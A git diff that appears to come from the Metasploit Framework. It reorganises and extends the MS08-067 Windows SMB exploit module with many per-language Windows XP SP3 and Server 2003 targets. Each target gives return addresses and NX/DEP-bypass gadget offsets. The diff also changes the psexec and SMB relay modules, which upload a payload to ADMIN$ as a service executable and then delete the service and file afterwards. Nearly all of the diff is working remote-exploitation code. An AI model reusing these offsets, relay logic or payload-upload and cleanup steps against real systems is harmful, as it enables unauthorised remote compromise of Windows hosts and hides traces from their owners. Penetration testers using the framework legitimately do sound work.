diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index bc87447324..dd37029b98 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -387,12 +387,12 @@ module Exploit::Remote::SMB [ Rex::Text.to_unicode('Remotedrucker') ], - 'Portugese - Brazilian' => + 'Portuguese - Brazilian' => [ Rex::Text.to_unicode('Impr. remotas Windows NT'), Rex::Text.to_unicode('Impressoras remotas do Windows NT') ], - 'Portguese' => + 'Portuguese' => [ Rex::Text.to_unicode('Imp. remotas do Windows NT') ], diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 1fbda45d7f..2bd89b9e16 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -66,7 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote # Automatic targetting via fingerprinting # [ 'Automatic Targeting', { 'auto' => true } ], - + + + # + # UNIVERSAL TARGETS + # + # # Antoine's universal for Windows 2000 # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET @@ -82,16 +87,18 @@ class Metasploit3 < Msf::Exploit::Remote # Standard return-to-ESI without NX bypass # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET # - [ 'Windows XP SP0/SP1 Universal (NO NX)', + [ 'Windows XP SP0/SP1 Universal', { 'Ret' => 0x01001361, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE - + # - # Metasploit's NX bypass for XP SP2/SP3 - # + # ENGLISH TARGETS + # + + # Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 English (NX)', { 'Ret' => 0x6f88f727, @@ -100,9 +107,70 @@ class Metasploit3 < Msf::Exploit::Remote } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 English (NX)', + { + 'Ret' => 0x6f88f807, + 'DisableNX' => 0x6F8917C2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Standard return-to-ESI without NX bypass + [ 'Windows 2003 SP0 English (NO NX)', + { + 'Ret' => 0x71bf175f, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + + # Standard return-to-ESI without NX bypass + [ 'Windows 2003 SP1 English (NO NX)', + { + 'Ret' => 0x71bf21a2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + # Brett Moore's crafty NX bypass for 2003 SP1 + [ 'Windows 2003 SP1 English (NX)', + { + 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL + 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL + 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL + 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], + + # Standard return-to-ESI without NX bypass + [ 'Windows 2003 SP2 English (NO NX)', + { + 'Ret' => 0x71bf3969, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + # Brett Moore's crafty NX bypass for 2003 SP2 + [ 'Windows 2003 SP2 English (NX)', + { + 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL + 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL + 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL + 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], + + # + # NON-ENGLISH TARGETS + # + + # Metasploit's NX bypass for XP SP2/SP3 - # [ 'Windows XP SP2 French (NX)', { 'Ret' => 0x595bf727, @@ -127,7 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit's NX bypass for XP SP2/SP3 # Target provided by Ramon de C. Valle # - [ 'Windows XP SP2 Portuguese (Brazil) (NX)', + [ 'Windows XP SP2 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff727, 'DisableNX' => 0x597016e2, @@ -150,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit's NX bypass for XP SP2/SP3 # Target provided by sunwear # - [ 'Windows XP SP2 Chinese - Traditional (NX)', + [ 'Windows XP SP2 Chinese - Simplified (NX)', { 'Ret' => 0x58fcda43, 'DisableNX' => 0x58fc16e2, @@ -168,19 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Scratch' => 0x00020408, } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # - # Metasploit's NX bypass for XP SP2/SP3 - # - [ 'Windows XP SP3 English (NX)', - { - 'Ret' => 0x6f88f807, - 'DisableNX' => 0x6F8917C2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # + # # Metasploit's NX bypass for XP SP2/SP3 # Target provided by Ulises2k # @@ -203,74 +259,191 @@ class Metasploit3 < Msf::Exploit::Remote } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Russian (NX)', + { + 'Ret' => 0x6fe1f807, + 'DisableNX' => 0x6fe217c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + # Same as Russian + [ 'Windows XP SP3 Czech (NX)', + { + 'Ret' => 0x6fe1f807, + 'DisableNX' => 0x6fe217c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Turkish (NX)', + { + 'Ret' => 0x5a78f807, + 'DisableNX' => 0x5a7917c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Swedish (NX)', + { + 'Ret' => 0x597af807, + 'DisableNX' => 0x597b17c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Portuguese (NX)', + { + 'Ret' => 0x596bf807, + 'DisableNX' => 0x596c17c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Ramon de C. Valle - # - [ 'Windows XP SP3 Portugese - Brazilian (NX)', + # Target provided by Ramon de C. Valle + [ 'Windows XP SP3 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff807, 'DisableNX' => 0x597017c2, 'Scratch' => 0x00020408, } ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL - - # - # Standard return-to-ESI without NX bypass - # - [ 'Windows 2003 SP0 English (NO NX)', + + # Metasploit's NX bypass for XP SP2/SP3 + # Same as Portuguese + [ 'Windows XP SP3 Italian (NX)', { - 'Ret' => 0x71bf175f, - 'Scratch' => 0x00020408, + 'Ret' => 0x596bf807, + 'DisableNX' => 0x596c17c2, + 'Scratch' => 0x00020408, } - ], # JMP ESI WS2HELP.DLL + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Polish (NX)', + { + 'Ret' => 0x5941f807, + 'DisableNX' => 0x594217c2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Standard return-to-ESI without NX bypass - # - [ 'Windows 2003 SP1 English (NO NX)', + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Norwegian (NX)', { - 'Ret' => 0x71bf21a2, - 'Scratch' => 0x00020408, + 'Ret' => 0x597cf807, + 'DisableNX' => 0x597d17c2, + 'Scratch' => 0x00020408, } - ], # JMP ESI WS2HELP.DLL - - # - # Standard return-to-ESI without NX bypass - # - [ 'Windows 2003 SP2 English (NO NX)', - { - 'Ret' => 0x71bf3969, - 'Scratch' => 0x00020408, - } - ], # JMP ESI WS2HELP.DLL + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # - # Brett Moore's crafty NX bypass for 2003 SP1 - # - [ 'Windows 2003 SP1 English (NX)', + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Korean (NX)', { - 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL - 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL - 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL - 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL - 'Scratch' => 0x00020408, + 'Ret' => 0x6fd6f807, + 'DisableNX' => 0x6fd717c2, + 'Scratch' => 0x00020408, } - ], - - # - # Brett Moore's crafty NX bypass for 2003 SP2 - # - [ 'Windows 2003 SP2 English (NX)', + ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Japanese (NX)', { - 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL - 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL - 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL - 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL - 'Scratch' => 0x00020408, + 'Ret' => 0x567fd4d2, + 'DisableNX' => 0x568017c2, + 'Scratch' => 0x00020408, } - ] - + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Hungarian (NX)', + { + 'Ret' => 0x5970f807, + 'DisableNX' => 0x597117c2, + 'Scratch' => 0x00020408, + } + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Hebrew (NX)', + { + 'Ret' => 0x5940f807, + 'DisableNX' => 0x594117c2, + 'Scratch' => 0x00020408, + } + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Finnish (NX)', + { + 'Ret' => 0x597df807, + 'DisableNX' => 0x597e17c2, + 'Scratch' => 0x00020408, + } + ], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Greek (NX)', + { + 'Ret' => 0x592af807, + 'DisableNX' => 0x592b17c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Danish (NX)', + { + 'Ret' => 0x5978f807, + 'DisableNX' => 0x597917c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Chinese - Simplified (NX)', + { + 'Ret' => 0x58fbf807, + 'DisableNX' => 0x58fc17c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Chinese - Traditional (NX)', + { + 'Ret' => 0x5860f807, + 'DisableNX' => 0x586117c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + # Same as Chinese Traditional + [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)', + { + 'Ret' => 0x5860f807, + 'DisableNX' => 0x586117c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + + # Metasploit's NX bypass for XP SP2/SP3 + [ 'Windows XP SP3 Arabic (NX)', + { + 'Ret' => 0x6fd8f807, + 'DisableNX' => 0x6fd917c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + # # Missing Targets # Key: T=TODO ?=UNKNOWN U=UNRELIABLE diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index ff1895213d..898e260b6b 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -191,7 +191,6 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Exception => e end - ## # OpenServiceW ## @@ -210,13 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - - - # print_line(" ") - # print_status("You *MUST* manually remove the service: (#{servicename} - \"#{displayname}\")") - # print_status("You *MUST* manually delete the service file: %SYSTEMROOT%\\#{filename}") - # print_line(" ") - + ## # StartService() ## @@ -234,12 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote return end - - ## - # Give the process time to initialize - ## - print_status("Waiting on process to initialize...") - ## # DeleteService() ## @@ -254,7 +241,6 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end - ## # CloseHandle() ## @@ -265,7 +251,6 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end - print_status("Deleting \\#{filename}...") simple.connect("ADMIN$") simple.delete("\\#{filename}") diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index a15561e107..0afec95ff4 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Uploading payload...") filename = rand_text_alpha(8) + ".exe" fd = rclient.open("\\#{filename}", 'rwct') - fd << Rex::Text.to_win32pe(code.encoded) + fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8)) fd.close print_status("Created \\#{filename}...") @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote ## servicename = rand_text_alpha(8) - displayname = 'M' + rand_text_alpha(rand(32)+1) + displayname = rand_text_alpha(rand(32)+1) svc_handle = nil svc_status = nil @@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(0) + # Password NDR.long(0) + # Password NDR.long(0) + # Password - NDR.long(0) # Password + NDR.long(0) # Password begin response = dcerpc.call(0x0c, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) @@ -226,11 +226,6 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - - print_line(" ") - print_status("You *MUST* manually remove the service: #{smb[:rhost]} (#{servicename} - \"#{displayname}\")") - print_status("You *MUST* manually delete the service file: #{smb[:rhost]} %SYSTEMROOT%\\#{filename}") - print_line(" ") ## # StartService() @@ -249,7 +244,33 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") end - handler(smb[:rsock]) + ## + # DeleteService() + ## + print_status("Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) + end + rescue ::Exception => e + print_status("Error: #{e}") + end + + ## + # CloseHandle() + ## + print_status("Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_status("Error: #{e}") + end + + print_status("Deleting \\#{filename}...") + simple.connect("ADMIN$") + simple.delete("\\#{filename}") end @@ -324,7 +345,6 @@ class Metasploit3 < Msf::Exploit::Remote target_host = smb[:ip] end - rsock = nil rport = nil [445, 139].each do |rport| @@ -362,7 +382,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Could not negotiate NTLMv1 with #{target_host}:#{rport} #{e.class} #{e.to_s}") raise e end - if (not rclient.client.challenge_key) print_error("No challenge key received from #{smb[:ip]}:#{rport}") @@ -494,4 +513,4 @@ class Metasploit3 < Msf::Exploit::Remote c.put(pkt.to_s) end -end \ No newline at end of file +end